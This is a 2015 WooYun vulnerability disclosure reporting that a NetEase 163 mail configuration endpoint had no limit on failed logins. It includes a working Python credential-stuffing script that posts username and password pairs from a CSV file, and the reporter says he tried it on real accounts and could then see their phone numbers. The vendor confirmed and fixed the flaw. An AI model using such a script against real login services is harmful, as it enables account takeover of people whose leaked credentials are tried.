当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124461

漏洞标题:网易通行证的一个无限撞库点有案例

相关厂商:网易

漏洞作者: reality0ne

提交时间:2015-07-04 12:03

修复时间:2015-08-21 10:26

公开时间:2015-08-21 10:26

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-04: 细节已通知厂商并且等待厂商处理中
2015-07-07: 厂商已经确认,细节仅向厂商公开
2015-07-17: 细节向核心白帽子及相关领域专家公开
2015-07-27: 细节向普通白帽子公开
2015-08-06: 细节向实习白帽子公开
2015-08-21: 细节向公众公开

简要描述:

无意间发现的一个无限撞库点

详细说明:

https://ssl.mail.163.com/config/mobileconfig/index

屏幕快照 2015-07-04 上午11.49.01.png


在这里输入用户名和密码,错误多少次都是没有限制的。
那么我们抓个包写个脚本实践下。

# encoding=utf-8
import re
import json
import requests
def parse_csv(filename):
with open(filename, 'r') as fp:
cr = re.compile(r'"(.*)","(.*)"')
result = cr.findall(fp.read())
return result
def do_request():
accounts = parse_csv('126.csv')
s = requests.Session()
for account in accounts:
params = {
'uid': account[0].lower(),
'password': account[1],
'mobile': '',
'cal': 'false',
'card': 'false',
'basepath': 'https://ssl.mail.163.com/config/',
'code': ''
}
resp = s.post('https://ssl.mail.163.com/config/mobileconfig/doconfig?m=url', data=params)
result = json.loads(resp.content)
print resp.content, account
if __name__ == '__main__':
do_request()


漏洞证明:

随便找了几个帐号实践下,结果如下

屏幕快照 2015-07-04 上午11.51.43.png


屏幕快照 2015-07-04 上午11.58.40.png


带上 cookie 访问那个页面的话还能直接找到手机号。

屏幕快照 2015-07-04 上午11.55.16.png


屏幕快照 2015-07-04 上午11.56.42.png


修复方案:

加限制喽~

版权声明:转载请注明来源 reality0ne@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-07-07 10:25

厂商回复:

漏洞已修复,感谢您对网易的关注!

最新状态:

暂无